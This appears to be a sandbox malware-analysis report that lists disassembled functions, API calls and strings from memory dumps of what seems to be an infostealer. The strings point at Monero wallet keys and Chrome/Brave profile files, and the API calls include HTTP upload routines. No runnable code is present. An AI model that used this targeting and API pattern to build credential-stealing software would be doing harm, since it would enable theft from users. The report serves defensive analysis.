Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 70ac35f577ebb1054fdddfbd77d023c7ea1aa1310866c0a1d9c3b01ecd67bb4c
Instruction ID: 031de317690c6e40a2edf9fa75207028aa777c60b185a3e0eb5ff23e168a68d5
Opcode Fuzzy Hash: 70ac35f577ebb1054fdddfbd77d023c7ea1aa1310866c0a1d9c3b01ecd67bb4c
Instruction Fuzzy Hash: 04A13CBA6022419FD344EFE8ED8896A37F9F76C701704851BEA07C3264D7399943DB62

Function 008945C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0089460F
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0089479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008945C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0089474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0089477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008946B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008946AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008945E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008945DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0089471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0089473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0089475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008946C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008946CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0089466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008945D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0089462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008945F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008946D8

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: 99d776af12b120d535df3ec0fddcd71e4c62e7d68453592c349f4ecb5c85cc47
Instruction ID: cdb03f246711f420ef9bbda9906a2076c6f0963c3094d9ca79f9caf794631eec
Opcode Fuzzy Hash: 99d776af12b120d535df3ec0fddcd71e4c62e7d68453592c349f4ecb5c85cc47
Instruction Fuzzy Hash: E54114617C36046ACE3DB7A4A84EFDDB676FF86F50F446040AC60A2380EEA465824735

Function 6C6535A0 Relevance: 38.8, APIs: 16, Strings: 6, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C6DF688,00001000), ref: 6C6535D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6535E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C6535FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C65363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C65369F
__aulldiv.LIBCMT ref: 6C6536E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C653773
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C65377E
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C6537BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C6537C4
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C6537CB
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C653801
__aulldiv.LIBCMT ref: 6C653883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C653902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C653918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C65394C

Strings

GTC, xrefs: 6C653912
AuthcAMDenti, xrefs: 6C653946
GenuntelineI, xrefs: 6C653639
++, xrefs: 6C65378A, 6C6537A3, 6C6537D7, 6C6537ED
MOZ_TIMESTAMP_MODE, xrefs: 6C6535DB
QPC, xrefs: 6C6538FC

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC$++
API String ID: 301339242-2040043655
Opcode ID: 3f96159be758dedfed38ec7b8d465651a4db19bfd3eb02ba300bdcb48bdc3dd7
Instruction ID: 14d1dd1505aced9cd8b45279eaef959e336740e5ad629c5ecbd62bb5e6e0c917
Opcode Fuzzy Hash: 3f96159be758dedfed38ec7b8d465651a4db19bfd3eb02ba300bdcb48bdc3dd7
Instruction Fuzzy Hash: B0B1B4B1B083509FDB08DF2AC89461AB7F5EB8A700F15893DF499D3790D770A9018B8E

Function 0089BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

FindFirstFileA.KERNEL32(00000000,?,008B0B32,008B0B2B,00000000,?,?,?,008B13F4,008B0B2A), ref: 0089BEF5
StrCmpCA.SHLWAPI(?,008B13F8), ref: 0089BF4D
StrCmpCA.SHLWAPI(?,008B13FC), ref: 0089BF63
FindNextFileA.KERNEL32(000000FF,?), ref: 0089C7BF
FindClose.KERNEL32(000000FF), ref: 0089C7D1

Strings

Google Chrome, xrefs: 0089C634
Brave, xrefs: 0089C102
\Brave\Preferences, xrefs: 0089C1DB
Preferences, xrefs: 0089C11E

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 888b91a92558336ad68abc952060fcb2e2996bf06185d50c307e679e0645aa6a
Instruction ID: 346c802a50ebc4eaa802abad9192678e88b7726a2a9d5ea4f6a941089c0e795a
Opcode Fuzzy Hash: 888b91a92558336ad68abc952060fcb2e2996bf06185d50c307e679e0645aa6a
Instruction Fuzzy Hash: 34426272900104ABDF58FBA4DD96EEE7378FB55300F408568B906D6981EF34AB49CB93

Function 008A4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 008A492C
FindFirstFileA.KERNEL32(?,?), ref: 008A4943
StrCmpCA.SHLWAPI(?,008B0FDC), ref: 008A4971
StrCmpCA.SHLWAPI(?,008B0FE0), ref: 008A4987
FindNextFileA.KERNEL32(000000FF,?), ref: 008A4B7D
FindClose.KERNEL32(000000FF), ref: 008A4B92

Strings

%s\*, xrefs: 008A4920
%s\%s, xrefs: 008A49FB
%s\%s, xrefs: 008A49A4

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 3520af8cd6a6fe5b5aa017bbfe83b58ec20151092a7ee5e201994cc6d200293d
Instruction ID: 898faa0ff02c18db21d3ee58c09850b54b51522ddda78f28e4200827041c3b8f
Opcode Fuzzy Hash: 3520af8cd6a6fe5b5aa017bbfe83b58ec20151092a7ee5e201994cc6d200293d
Instruction Fuzzy Hash: 246154B1900218ABDF24EBE4DC45EEA737CFB59700F048589B50AD6141EB74DB45CF92

Function 00894880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00894839
Part of subcall function 008947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00894849

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00894915
StrCmpCA.SHLWAPI(?,0156E4F0), ref: 0089493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00894ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,008B0DDB,00000000,?,?,00000000,?,",00000000,?,0156E500), ref: 00894DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00894E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00894E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00894E49
InternetCloseHandle.WININET(00000000), ref: 00894EAD
InternetCloseHandle.WININET(00000000), ref: 00894EC5
HttpOpenRequestA.WININET(00000000,0156E510,?,0156DC98,00000000,00000000,00400100,00000000), ref: 00894B15

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

InternetCloseHandle.WININET(00000000), ref: 00894ECF

Strings

------, xrefs: 008949BD
------, xrefs: 00894B28
", xrefs: 00894BF2
", xrefs: 00894D33
------, xrefs: 00894C69

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
